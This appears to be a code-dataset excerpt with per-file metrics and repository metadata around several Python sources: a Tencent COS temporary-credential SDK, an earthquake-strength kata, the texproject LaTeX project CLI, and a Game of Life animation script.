| 30.735294 | 118 | 0.539952 | 548 | 4,180 | 4.076642 | 0.315693 | 0.019696 | 0.013429 | 0.007162 | 0.055506 | 0.025067 | 0 | 0 | 0 | 0 | 0 | 0.013643 | 0.351196 | 4,180 | 135 | 119 | 30.962963 | 0.810103 | 0.267703 | 0 | 0.171053 | 0 | 0 | 0.014676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144737 | false | 0 | 0.026316 | 0.039474 | 0.328947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6ca557f603a97a74f408033965ff6cad9e9699 | 6,901 | py | Python | python/build/lib/sts/sts.py | BrandoZhang/qcloud-cos-sts-sdk | 84b5fdfaaba00ed7eb1c35146e693b22a07fc877 | [
"MIT"
] | 1 | 2019-07-09T09:35:44.000Z | 2019-07-09T09:35:44.000Z | python/build/lib/sts/sts.py | BrandoZhang/qcloud-cos-sts-sdk | 84b5fdfaaba00ed7eb1c35146e693b22a07fc877 | [
"MIT"
] | null | null | null | python/build/lib/sts/sts.py | BrandoZhang/qcloud-cos-sts-sdk | 84b5fdfaaba00ed7eb1c35146e693b22a07fc877 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import hashlib
import hmac
import time
try:
    from urllib import quote  # Python 2.X
except ImportError:
    from urllib.parse import quote  # Python 3+
from functools import reduce
import json
import base64
import requests
import random
class Sts:
    def __init__(self, config={}):
        if 'allow_actions' in config:
            self.allow_actions = config.get('allow_actions')
        # else:
        #     raise ValueError('missing allow_actions')
        if 'duration_seconds' in config:
            self.duration = config.get('duration_seconds')
            if not isinstance(self.duration, int):
                raise ValueError('duration_seconds must be int type')
        else:
            self.duration = 1800
        self.sts_url = 'sts.tencentcloudapi.com/'
        self.sts_scheme = 'https://'
        self.secret_id = config.get('secret_id')
        self.secret_key = config.get('secret_key')
        self.proxy = config.get('proxy')
        self.region = config.get('region')
        self.policy = config.get('policy')
        bucket = config.get('bucket')
        if bucket is not None:
            split_index = bucket.rfind('-')
            short_bucket_name = bucket[:split_index]
            appid = bucket[(split_index + 1):]
            self.resource = "qcs::cos:{region}:uid/{appid}:prefix//{appid}/{short_bucket_name}/{allow_prefix}".format(
                region=config['region'], appid=appid, short_bucket_name=short_bucket_name,
                allow_prefix=config['allow_prefix']
            )
    @staticmethod
    def get_policy(scopes=[]):
        if not isinstance(scopes, list):
            return None
        policy = dict()
        policy['version'] = '2.0'
        statement = list()
        for scope in scopes:
            statement_element = dict()
            actions = list()
            resources = list()
            actions.append(scope.get_action())
            statement_element['action'] = actions
            statement_element['effect'] = 'allow'
            principal = dict()
            principal['qcs'] = list('*')
            statement_element['principal'] = principal
            resources.append(scope.get_resource())
            statement_element['resource'] = resources
            statement.append(statement_element)
        policy['statement'] = statement
        return policy
    def get_credential(self):
        try:
            import ssl
        except ImportError as e:
            raise e
        if self.policy is None:
            policy = {
                'version': '2.0',
                'statement': {
                    'action': self.allow_actions,
                    'effect': 'allow',
                    'principal': {'qcs': '*'},
                    'resource': self.resource
                }
            }
        else:
            policy = self.policy
        policy_encode = quote(json.dumps(policy))
        data = {
            'SecretId': self.secret_id,
            'Timestamp': int(time.time()),
            'Nonce': random.randint(100000, 200000),
            'Action': 'GetFederationToken',
            'Version': '2018-08-13',
            'DurationSeconds': self.duration,
            'Name': 'cos-sts-python',
            'Policy': policy_encode,
            'Region': 'ap-guangzhou'
        }
        data['Signature'] = self.__encrypt('POST', self.sts_url, data)
        try:
            response = requests.post(self.sts_scheme + self.sts_url, proxies=self.proxy, data=data)
            result_json = response.json()
            if isinstance(result_json['Response'], dict):
                result_json = result_json['Response']
            result_json['startTime'] = result_json['ExpiredTime'] - self.duration
            return self._backwardCompat(result_json)
        except requests.exceptions.HTTPError as e:
            raise e
    def __encrypt(self, method, url, key_values):
        source = Tools.flat_params(key_values)
        source = method + url + '?' + source
        try:
            key = bytes(self.secret_key)  # Python 2.X
            source = bytes(source)
        except TypeError:
            key = bytes(self.secret_key, encoding='utf-8')  # Python 3.X
            source = bytes(source, encoding='utf-8')
        sign = hmac.new(key, source, hashlib.sha1).digest()
        sign = base64.b64encode(sign).rstrip()
        return sign
    # v2 API keys start with a lowercase letter, while v3 switched to uppercase;
    # this conversion keeps backward compatibility with the v2 key style.
    def _backwardCompat(self, result_json):
        bc_json = dict()
        for k, v in result_json.items():
            if isinstance(v, dict):
                bc_json[k[0].lower() + k[1:]] = self._backwardCompat(v)
            elif k == 'Token':
                bc_json['sessionToken'] = v
            else:
                bc_json[k[0].lower() + k[1:]] = v
        return bc_json
class Tools(object):
    @staticmethod
    def _flat_key_values(a):
        return a[0] + '=' + str(a[1])
    @staticmethod
    def _link_key_values(a, b):
        return a + '&' + b
    @staticmethod
    def flat_params(key_values):
        key_values = sorted(key_values.items(), key=lambda d: d[0])
        return reduce(Tools._link_key_values, map(Tools._flat_key_values, key_values))
class Scope(object):
    action = None
    bucket = None
    region = None
    resource_prefix = None
    def __init__(self, action=None, bucket=None, region=None, resource_prefix=None):
        self.action = action
        self.bucket = bucket
        self.region = region
        self.resource_prefix = resource_prefix
    def set_bucket(self, bucket):
        self.bucket = bucket
    def set_region(self, region):
        self.region = region
    def set_action(self, action):
        self.action = action
    def set_resource_prefix(self, resource_prefix):
        self.resource_prefix = resource_prefix
    def get_action(self):
        return self.action
    def get_resource(self):
        split_index = self.bucket.rfind('-')
        bucket_name = str(self.bucket[:split_index]).strip()
        appid = str(self.bucket[(split_index + 1):]).strip()
        if not str(self.resource_prefix).startswith('/'):
            self.resource_prefix = '/' + self.resource_prefix
        resource = "qcs::cos:{region}:uid/{appid}:" \
                   "prefix//{appid}/{bucket_name}{prefix}".format(region=self.region,
                                                                  appid=appid,
                                                                  bucket_name=bucket_name,
                                                                  prefix=self.resource_prefix)
        return resource
    def get_dict(self):
        result = dict()
        result['action'] = self.action
        result['bucket'] = self.bucket
        result['region'] = self.region
        result['prefix'] = self.resource_prefix
        return result
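# Minimal usage sketch (placeholder credentials and bucket; the network call
# itself is left commented out so nothing is sent):
if __name__ == '__main__':
    demo_config = {
        'secret_id': 'your-secret-id',      # placeholder
        'secret_key': 'your-secret-key',    # placeholder
        'bucket': 'example-1250000000',     # placeholder <bucket>-<appid>
        'region': 'ap-guangzhou',
        'allow_prefix': '*',
        'allow_actions': ['name/cos:PutObject'],
        'duration_seconds': 1800,
    }
    sts = Sts(demo_config)
    # credential = sts.get_credential()  # performs an HTTPS request to STS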
| 31.655963 | 118 | 0.555282 | 733 | 6,901 | 5.061392 | 0.218281 | 0.049057 | 0.038814 | 0.032345 | 0.15903 | 0.08841 | 0.07655 | 0.0469 | 0.025876 | 0 | 0 | 0.011457 | 0.329662 | 6,901 | 217 | 119 | 31.801843 | 0.790532 | 0.021011 | 0 | 0.122807 | 0 | 0 | 0.099466 | 0.025348 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093567 | false | 0 | 0.076023 | 0.017544 | 0.274854 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6d0d07bf48436061a0838a663ce18440a66dc5 | 1,675 | py | Python | python/earthquake.py | FranzSchubert92/cw | e59bab1f942f17a17bbf05a3c87733bae6ab1ebb | [
"BSD-3-Clause"
] | 1 | 2017-09-07T21:14:40.000Z | 2017-09-07T21:14:40.000Z | python/earthquake.py | FranzSchubert92/cw | e59bab1f942f17a17bbf05a3c87733bae6ab1ebb | [
"BSD-3-Clause"
] | null | null | null | python/earthquake.py | FranzSchubert92/cw | e59bab1f942f17a17bbf05a3c87733bae6ab1ebb | [
"BSD-3-Clause"
] | null | null | null | """
You have been employed by the Japanese government to write a function that tests
whether or not a building is strong enough to withstand a simulated earthquake.
A building will fall if the magnitude of the earthquake is greater than the
strength of the building.
An earthquake takes the form of a 2D-Array. Each element within the Outer-Array
represents a shockwave, and each element within the Inner-Arrays represents a
tremor. The magnitude of the earthquake is determined by the product of the
values of its shockwaves. A shockwave is equal to the sum of the values of its
tremors.
Example earthquake -->
[[5,3,7],[3,3,1],[4,1,2]] ((5+3+7) * (3+3+1) * (4+1+2)) = 735
A building begins with a strength value of 1000 when first built, but this
value is subject to exponential decay of 1% per year. For more info on
exponential decay, follow this link -
https://en.wikipedia.org/wiki/Exponential_decay
Given an earthquake and the age of a building, write a function that returns
"Safe!" if the building is strong enough, or "Needs Reinforcement!" if it falls.
>>> strong_enough( [[5,3,7],[3,3,1],[4,1,2]], 0)
'Safe!'
>>> strong_enough( [[5,8,7],[3,3,1],[4,1,2]], 2)
'Safe!'
>>> strong_enough( [[5,8,7],[3,3,1],[4,1,2]], 3)
'Needs Reinforcement!'
"""
from functools import reduce
from operator import mul
def strong_enough(earthquake, age):
    TXT_S, TXT_R = "Safe!", "Needs Reinforcement!"
    building_strength = 1000 * 0.99**age
    quake_strength = reduce(mul, (sum(wave) for wave in earthquake))
    return TXT_R if quake_strength > building_strength else TXT_S
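# Worked check of the third doctest above: magnitude = (5+8+7)*(3+3+1)*(4+1+2)
# = 20 * 7 * 7 = 980, while a 3-year-old building has decayed to
# 1000 * 0.99**3 = 970.299; since 980 > 970.299 the result is
# 'Needs Reinforcement!' (at age 2 the strength is 980.1, so 980 still passes).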
if __name__ == '__main__':
    import doctest
    doctest.testmod()
| 33.5 | 81 | 0.714627 | 284 | 1,675 | 4.140845 | 0.415493 | 0.061224 | 0.012755 | 0.017007 | 0.142007 | 0.114796 | 0.065476 | 0.065476 | 0.065476 | 0.042517 | 0 | 0.04631 | 0.174925 | 1,675 | 49 | 82 | 34.183673 | 0.804631 | 0.758209 | 0 | 0 | 0 | 0 | 0.083544 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6d275991d90be0d5dbb0d47ae92a44046ed849 | 20,186 | py | Python | src/texproject/command.py | alexrutar/texproject | ba7427ecfd7a9141bfce61ae30b2abc3ada69d2c | [
"MIT"
] | 1 | 2020-07-05T04:13:42.000Z | 2020-07-05T04:13:42.000Z | src/texproject/command.py | alexrutar/texproject | ba7427ecfd7a9141bfce61ae30b2abc3ada69d2c | [
"MIT"
] | null | null | null | src/texproject/command.py | alexrutar/texproject | ba7427ecfd7a9141bfce61ae30b2abc3ada69d2c | [
"MIT"
] | null | null | null | """TODO: write docstring"""
from __future__ import annotations
from dataclasses import astuple
from difflib import unified_diff
from functools import update_wrapper
from pathlib import Path
import sys
import tempfile
from typing import TYPE_CHECKING
import click
from . import __version__, __repo__
from .base import SHUTIL_ARCHIVE_FORMATS, SHUTIL_ARCHIVE_SUFFIX_MAP
from .error import AbortRunner, ValidationError
from .export import ArchiveWriter
from .filesystem import (
ProjectPath,
NAMES,
style_linker,
macro_linker,
citation_linker,
template_linker,
toml_load_local_template,
)
from .git import CreateGithubRepo, WriteGithubApiToken
from .process import LatexCompiler, InitializeGitRepo
from .template import (
OutputFolderCreator,
InfoFileWriter,
GitignoreWriter,
PrecommitWriter,
TemplateDictLinker,
FileEditor,
NameSequenceLinker,
PathSequenceLinker,
ApplyModificationSequence,
TemplateDictWriter,
GitFileWriter,
LatexBuildWriter,
UpgradeRepository,
CleanRepository,
)
if TYPE_CHECKING:
from .base import Modes, NAMES, RepoVisibility
from typing import Optional, Iterable, Any, List, Literal, Dict, Final, Callable
from .control import AtomicIterable, RuntimeClosure
class CommandRunner:
def __init__(
self, proj_path: ProjectPath, template_dict: Dict, dry_run=False, verbose=True
):
self._proj_path: Final = proj_path
self._template_dict: Final = template_dict
self._dry_run = dry_run
self._verbose = verbose
def atomic_outputs(
self,
command_iter: Iterable[AtomicIterable],
state_init: Callable[[], Dict[str, Any]] = lambda: {},
) -> Iterable[RuntimeClosure]:
state = state_init()
for at_iter in command_iter:
with tempfile.TemporaryDirectory() as temp_dir_str:
temp_dir = Path(temp_dir_str)
yield from at_iter(
self._proj_path, self._template_dict, state, temp_dir
)
def process_output(self, rtc: RuntimeClosure):
# add dry_run and verbose processing here
inferred_success = rtc.success()
if self._dry_run:
click.echo(rtc.message())
return inferred_success
else:
success, out = astuple(rtc.run())
if self._verbose:
if success:
click.echo(rtc.message())
else:
click.secho(click.unstyle(rtc.message()), fg="red", err=True)
if out is not None:
click.echo(out.decode("ascii"), err=not success)
# if not dry run, both need to pass
return success and inferred_success
def execute(
self,
command_iter: Iterable[AtomicIterable],
state_init: Callable[[], Dict[str, str]] = lambda: {},
):
try:
# list is needed here to avoid generator short-circuiting:
# side effects are important!
if not all(
[
self.process_output(rtc)
for rtc in self.atomic_outputs(command_iter, state_init)
]
):
click.secho(
"\nError: Runner completed, but one of the commands failed!",
err=True,
fg="red",
)
sys.exit(1)
except AbortRunner as e:
click.secho(
f"Runner aborted with error message '{str(e)}'. Dumping stderr: ",
err=True,
fg="red",
)
click.echo(e.stderr.decode("ascii"), err=True)
sys.exit(1)
class ValidationFunction:
@staticmethod
def proj_exists(exists=bool):
return lambda proj_path: proj_path.validate(exists=exists)
@staticmethod
def git_exists(exists=bool):
return lambda proj_path: proj_path.validate_git(exists=exists)
def process_atoms(
*validation_funcs: Callable[[ProjectPath], bool], pass_template_name=False
):
"""Custom decorator which passes the object after performing some state verification on it."""
def state_constructor(template: Optional[str] = None) -> Callable[[], Dict]:
def state_init() -> Dict:
dct = {
"linked": {NAMES.convert_mode(mode): [] for mode in NAMES.modes},
"template_modifications": [],
}
names = {"template": template} if template is not None else {}
return dct | names
return state_init
def decorator(f):
if pass_template_name:
@click.argument(
"template",
type=click.Choice(template_linker.list_names()),
metavar="TEMPLATE",
)
@click.pass_context
def new_func_1(ctx, template: str, *args, **kwargs):
try:
for func in validation_funcs:
func(ctx.obj["proj_path"])
except ValidationError as e:
click.secho(
f"Error validating working directory: {e}", fg="red", err=True
)
sys.exit(1)
command_iter = ctx.invoke(f, *args, **kwargs)
runner = CommandRunner(
ctx.obj["proj_path"],
template_linker.load_template(template),
dry_run=ctx.obj["dry_run"],
verbose=ctx.obj["verbose"],
)
runner.execute(command_iter, state_init=state_constructor(template))
return update_wrapper(new_func_1, f)
else:
@click.pass_context
def new_func(ctx, *args, **kwargs):
try:
for func in validation_funcs:
func(ctx.obj["proj_path"])
except ValidationError as e:
click.secho(
f"Error validating working directory: {e}", fg="red", err=True
)
sys.exit(1)
command_iter = ctx.invoke(f, *args, **kwargs)
runner = CommandRunner(
ctx.obj["proj_path"],
toml_load_local_template(ctx.obj["proj_path"].template),
dry_run=ctx.obj["dry_run"],
verbose=ctx.obj["verbose"],
)
runner.execute(command_iter, state_init=state_constructor())
return update_wrapper(new_func, f)
return decorator
# TODO
# figure out how to just stick these wrappers directly inside the process_atoms function
# then -n and --verbose can be specified at the end, rather than right at the front
@click.group()
@click.version_option(prog_name="tpr (texproject)")
@click.option(
"-C",
"proj_dir",
default=".",
show_default=True,
help="working directory",
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, path_type=Path
),
)
@click.option(
"-n",
"--dry-run",
"dry_run",
is_flag=True,
default=False,
help="Describe changes but do not execute",
)
@click.option("--verbose/--silent", "-v/-V", "verbose", default=True, help="Be verbose")
@click.pass_context
def cli(ctx, proj_dir: Path, dry_run: bool, verbose: bool) -> None:
"""TexProject is a tool to help streamline the creation and distribution of files
written in LaTeX.
"""
ctx.obj = {
"proj_path": ProjectPath(proj_dir),
"dry_run": dry_run,
"verbose": verbose,
}
@cli.command()
@process_atoms(ValidationFunction.proj_exists(False), pass_template_name=True)
def init() -> Iterable[AtomicIterable]:
"""Initialize a new project in the working directory. The project is created using
the template with name TEMPLATE and placed in the output folder OUTPUT.
The path working directory either must not exist or be an empty folder. Missing
intermediate directories are automatically constructed.
"""
# must link templates before writing
yield OutputFolderCreator()
yield TemplateDictLinker()
yield InfoFileWriter()
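# Example invocation (sketch; 'plain' stands in for any installed template name):
#   tpr -C ./my-paper init plain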
@cli.command()
@click.option(
    "--local", "config_file", flag_value="local", help="Edit local configuration."
)
@click.option(
    "--global",
    "config_file",
    flag_value="global",
    help="Edit global configuration.",
    default=True,
)
@process_atoms()
def config(config_file: Literal["local", "global"]) -> Iterable[AtomicIterable]:
    """Edit texproject configuration files. This opens the corresponding file in your
    $EDITOR. By default, the global configuration file is opened; editing the local
    configuration requires the working directory to be a texproject directory.
    Note that this command does not replace existing macro files. See the `tpr import`
    command for this functionality.
    """
    yield FileEditor(config_file)
def _link_option(mode: Modes):
    linker = {"macro": macro_linker, "citation": citation_linker, "style": style_linker}
    return click.option(
        f"--{mode}",
        f"{NAMES.convert_mode(mode)}",
        multiple=True,
        type=click.Choice(linker[mode].list_names()),
        help=f"{mode} file",
        show_default=False,
    )
def _path_option(mode: Modes):
    return click.option(
        f"--{mode}-path",
        f"{mode}_paths",
        multiple=True,
        type=click.Path(
            exists=True, file_okay=True, dir_okay=False, writable=False, path_type=Path
        ),
        help=f"{mode} file path",
    )
@cli.command("import")
@_link_option("macro")
@_link_option("citation")
@_link_option("style")
@_path_option("macro")
@_path_option("citation")
@_path_option("style")
@click.option(
    "--gitignore",
    "gitignore",
    is_flag=True,
    default=False,
    help="auto-generated gitignore",
)
@click.option(
    "--pre-commit",
    "pre_commit",
    is_flag=True,
    default=False,
    help="auto-generated pre-commit",
)
@process_atoms(ValidationFunction.proj_exists(True))
def import_(
    macros: Iterable[str],
    citations: Iterable[str],
    styles: Iterable[str],
    macro_paths: Iterable[Path],
    citation_paths: Iterable[Path],
    style_paths: Iterable[Path],
    gitignore: bool,
    pre_commit: bool,
) -> Iterable[AtomicIterable]:
    """Import macro, citation, and format files. This command will replace existing
    files. Note that this command does not import the files into the main .tex file.
    The --macro-path and --citation-path options allow macro and citation files to be
    specified as paths to existing files. For example, this enables imports which are
    not installed in the texproject data directory.
    """
    for mode, names, paths in [
        ("macro", macros, macro_paths),
        ("citation", citations, citation_paths),
        ("style", styles, style_paths),
    ]:
        yield NameSequenceLinker(mode, names, force=True)
        yield PathSequenceLinker(mode, paths, force=True)
    if gitignore:
        yield GitignoreWriter(force=True)
    if pre_commit:
        yield PrecommitWriter(force=True)
@cli.command()
@click.option(
    "--pdf",
    "pdf",
    help="write .pdf to file",
    type=click.Path(exists=False, writable=True, path_type=Path),
)
@click.option(
    "--logfile",
    help="write .log to file",
    type=click.Path(exists=False, writable=True, path_type=Path),
)
@process_atoms(ValidationFunction.proj_exists(True))
def validate(pdf: Optional[Path], logfile: Optional[Path]) -> Iterable[AtomicIterable]:
    """Check for compilation errors. Compilation is performed by the 'latexmk' command.
    Save the resulting pdf with the '--pdf' argument, or the log file with the
    '--logfile' argument. These options, if specified, will overwrite existing files.
    """
    yield LatexCompiler(
        output_map={
            k: v for k, v in {".pdf": pdf, ".log": logfile}.items() if v is not None
        }
    )
@cli.command()
@click.option(
    "--format",
    "compression",
    type=click.Choice(SHUTIL_ARCHIVE_FORMATS, case_sensitive=False),
    help="compression mode",
)
@click.option(
    "--mode",
    "mode",
    type=click.Choice(["arxiv", "build", "source"]),
    default="source",
    show_default=True,
    help="specify what to export",
)
@click.argument("output", type=click.Path(exists=False, writable=True, path_type=Path))
@process_atoms(ValidationFunction.proj_exists(True))
def archive(
    compression: str, mode: Literal["arxiv", "build", "source"], output: Path
) -> Iterable[AtomicIterable]:
    """Create a compressed export with name OUTPUT. If the 'arxiv' or 'build' options are
    chosen, 'latexmk' is used to compile additional required files.
    The --format option specifies the format of the resulting archive. If unspecified,
    the format is inferred from the resulting filename if possible. Otherwise, the output
    format is 'tar'.
    If the format is not inferred from the filename, the archive file suffix is appended
    automatically.
    \b
    Archive modes:
      arxiv: format source files for arxiv (https://arxiv.org)
      build: compile the .pdf and export
      source: export the source files only
    \b
    Compression:
      bztar: bzip2'ed tar-file
      gztar: gzip'ed tar-file
      tar: uncompressed tar-file
      xztar: xz'ed tar-file
      zip: ZIP file
    Note that not all compression modes may be available on your system.
    """
    if compression is None:
        try:
            compression = SHUTIL_ARCHIVE_SUFFIX_MAP[output.suffix]
            output = output.parent / output.stem
        except KeyError:
            compression = "tar"
    yield ArchiveWriter(compression, output, fmt=mode)
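# Example invocations (sketch; file names are placeholders):
#   tpr archive --mode build paper.tar.gz
#   tpr archive --format zip --mode arxiv submission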
@cli.group()
def template() -> None:
    """Modify the template dictionary."""
@template.command()
@_link_option("macro")
@_link_option("citation")
@_link_option("style")
@click.option("--index", "index", help="position to insert", default=0, type=int)
@process_atoms(ValidationFunction.proj_exists(True))
def add(
    macros: List[str],
    citations: List[str],
    styles: List[str],
    index: int,
) -> Iterable[AtomicIterable]:
    """Add entries to the template dictionary. The --index option allows you to specify
    the index to insert the citation (--index 0 means to insert at the beginning).
    """
    for mode, names in [("macro", macros), ("citation", citations), ("style", styles)]:
        yield ApplyModificationSequence((mode, "add", name, index) for name in names)
    yield TemplateDictWriter()
@template.command()
@_link_option("macro")
@_link_option("citation")
@_link_option("style")
@process_atoms(ValidationFunction.proj_exists(True))
def remove(
    macros: List[str], citations: List[str], styles: List[str]
) -> Iterable[AtomicIterable]:
    """Remove entries from the template dictionary."""
    for mode, names in [("macro", macros), ("citation", citations), ("style", styles)]:
        yield ApplyModificationSequence((mode, "remove", name) for name in names)
    yield TemplateDictWriter()
@template.command()
@process_atoms(ValidationFunction.proj_exists(True))
def edit():
    """Edit the template dictionary file."""
    yield FileEditor("template")
@cli.group()
def git() -> None:
    """Manage git and GitHub repositories."""
@git.command("init")
@click.option(
    "--repo-name",
    "repo_name",
    prompt="Repository name",
    help="Name of the repository",
    type=str,
)
@click.option(
    "--repo-description",
    "repo_desc",
    prompt="Repository description",
    help="Repository description",
    type=str,
)
@click.option(
    "--repo-visibility",
    "vis",
    prompt="Repository visibility",
    type=click.Choice(["public", "private"]),
    help="Specify public or private repository",
    default="private",
)
@click.option(
    "--wiki/--no-wiki",
    "wiki",
    prompt="Include wiki?",
    help="Create wiki",
    default=False,
)
@click.option(
    "--issues/--no-issues",
    "issues",
    prompt="Include issues?",
    help="Create issues page",
    default=False,
)
@process_atoms(
    ValidationFunction.proj_exists(True), ValidationFunction.git_exists(False)
)
def git_init(
    repo_name: str,
    repo_desc: str,
    vis: RepoVisibility,
    wiki: bool,
    issues: bool,
) -> Iterable[AtomicIterable]:
    """Initialize git and a corresponding GitHub repository. If called with no options,
    this command will interactively prompt you in order to initialize the repo correctly.
    This command also creates a GitHub action which automatically compiles and releases
    the main .pdf file for tagged releases.
    If you have specified 'github.archive', the GitHub action will also automatically
    push the build files to the corresponding folder in the specified repository. In
    order for this to work, you must provide an access token with at least repo
    privileges. This can be done (in order of priority) by
    1) setting the environment variable $API_TOKEN_GITHUB, or
    2) setting the 'github.keyring' settings in the configuration
    Otherwise, the token will default to the empty string. The access token is not
    required for the build action functionality.
    """
    yield GitFileWriter()
    yield InitializeGitRepo()
    yield CreateGithubRepo(repo_name, repo_desc, vis, wiki, issues)
    yield WriteGithubApiToken(repo_name)
@git.command("init-files")
@click.option("--force/--no-force", "-f/-F", default=False, help="overwrite files")
@process_atoms(
    ValidationFunction.proj_exists(True), ValidationFunction.git_exists(False)
)
def init_files(force: bool) -> Iterable[AtomicIterable]:
    """Create the git repository files. This does not create a local or remote git
    repository.
    """
    yield GitFileWriter(force=force)
@git.command("init-archive")
@click.option(
    "--repo-name",
    "repo_name",
    prompt="Repository name",
    help="name of the repository",
    type=str,
)
@process_atoms(ValidationFunction.proj_exists(True))
def init_archive(repo_name: str) -> Iterable[AtomicIterable]:
    """Set the GitHub secret and archive repository."""
    yield LatexBuildWriter(force=True)
    yield WriteGithubApiToken(repo_name)
@cli.group()
def util() -> None:
    """Miscellaneous utilities."""
@util.command("upgrade")
@process_atoms(ValidationFunction.proj_exists(True))
def upgrade() -> Iterable[AtomicIterable]:
    """Upgrade the project data structure from previous versions."""
    yield UpgradeRepository()
@util.command("refresh")
@click.option("--force/--no-force", "-f/-F", default=False, help="overwrite files")
@process_atoms(ValidationFunction.proj_exists(True))
def refresh(force: bool) -> Iterable[AtomicIterable]:
    """Reload template files. If --force is specified, overwrite local template files
    with new versions from the template repository, if possible.
    """
    yield TemplateDictLinker(force=force)
    yield InfoFileWriter()
@util.command()
@process_atoms(ValidationFunction.proj_exists(True))
def clean() -> Iterable[AtomicIterable]:
    """Clean the project directory. This deletes any template files that are not
    currently loaded in the template dictionary.
    """
    yield CleanRepository()
@util.command()
@_link_option("macro")
@_link_option("citation")
@_link_option("style")
@process_atoms(ValidationFunction.proj_exists(True))
def diff(
    macros: List[str],
    citations: List[str],
    styles: Optional[str],
) -> Iterable[AtomicIterable]:
    """Display changes in local template files."""
    raise NotImplementedError
@util.command()
def show_config():
    """Print the default global configuration."""
    from . import defaults
    from importlib import resources
    click.echo(resources.read_text(defaults, "config.toml"), nl=False)
@cli.command("list")
@click.argument("res_class", type=click.Choice(NAMES.modes + ("template",)))
def list_(res_class: Modes | Literal["template"]) -> None:
    """Retrieve program and template information."""
    linker_map = {
        "citation": citation_linker,
        "macro": macro_linker,
        "style": style_linker,
        "template": template_linker,
    }
    click.echo("\n".join(linker_map[res_class].list_names()))
| 30.771341 | 98 | 0.648122 | 2,346 | 20,186 | 5.456948 | 0.193521 | 0.018903 | 0.032807 | 0.037182 | 0.244962 | 0.22684 | 0.213014 | 0.186924 | 0.16599 | 0.155679 | 0 | 0.000717 | 0.239473 | 20,186 | 655 | 99 | 30.818321 | 0.833181 | 0.208511 | 0 | 0.331224 | 0 | 0 | 0.112499 | 0.003075 | 0 | 0 | 0 | 0.001527 | 0 | 1 | 0.07384 | false | 0.012658 | 0.050633 | 0.006329 | 0.151899 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6ec61de92486e850b6c18987f949b40c50bc09 | 1,240 | py | Python | scripts/animate_life.py | acse-ogb119/MPI-Game-of-Life | b4658b46b5eccf8dd4f1d9e19d67dd1dbdff1f11 | [
"MIT"
] | null | null | null | scripts/animate_life.py | acse-ogb119/MPI-Game-of-Life | b4658b46b5eccf8dd4f1d9e19d67dd1dbdff1f11 | [
"MIT"
] | null | null | null | scripts/animate_life.py | acse-ogb119/MPI-Game-of-Life | b4658b46b5eccf8dd4f1d9e19d67dd1dbdff1f11 | [
"MIT"
] | null | null | null | import glob
from PIL import Image
from functools import partial
# read in metadata file entries to a list of lists
print("Loading simulation metadata...")
fname = "./outfiles/metadata.txt"
metadata = []
with open(fname, "r") as f:
    for line in f:
        metadata.append(line.split())
# parse metadata variables
rows = int(metadata[0][1])
cols = int(metadata[0][2])
num_procs = int(metadata[1][1])
iprocs = int(metadata[2][1])
jprocs = int(metadata[2][2])
num_gen = int(metadata[3][1])
is_periodic = int(metadata[4][1])
freq_dump = int(metadata[5][1])
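# Assumed layout of metadata.txt (the key names in the first column are
# illustrative placeholders -- only the value positions are used above):
#   size      <rows> <cols>
#   nprocs    <num_procs>
#   procgrid  <iprocs> <jprocs>
#   ngen      <num_gen>
#   periodic  <0|1>
#   freqdump  <freq_dump>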
def create_animation():
    palette = [0, 0, 0, 255, 255, 255]
    palette = palette + [0] * (768 - len(palette))
    paths = glob.glob('./outfiles/dump*')
    imgs = []
    for path in sorted(paths, key=lambda x: int(x.split("p")[1])):
        with open(path, 'rb') as ifile:
            for data in iter(partial(ifile.read, rows * cols), b''):
                img = Image.frombuffer('L', (cols, rows), data)
                img.putpalette(palette)
                imgs.append(img)
    imgs[0].save('animation.gif', save_all=True, append_images=imgs[1:], loop=0)
# write and save the animation
print("Writing animation.gif...")
create_animation()
print("\nAnimation ready.")
| 27.555556 | 80 | 0.640323 | 182 | 1,240 | 4.318681 | 0.478022 | 0.111959 | 0.030534 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036 | 0.193548 | 1,240 | 44 | 81 | 28.181818 | 0.75 | 0.082258 | 0 | 0 | 0 | 0 | 0.113757 | 0.020282 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.090909 | 0 | 0.121212 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df70c9594d22d90dd33b9f0c85fed78d3076ccbf | 659 | py | Python | py/List.RandomiseDivide.py | mathematicalmichael/SpringNodes | 3ff4034b6e57ee6efa55c963e1819f3d30a2c4ab | [
"MIT"
] | 51 | 2015-09-25T09:30:57.000Z | 2022-01-19T14:16:44.000Z | py/List.RandomiseDivide.py | sabeelcoder/SpringNodes | e21a24965474d54369e74d23c06f8c42a7b926b5 | [
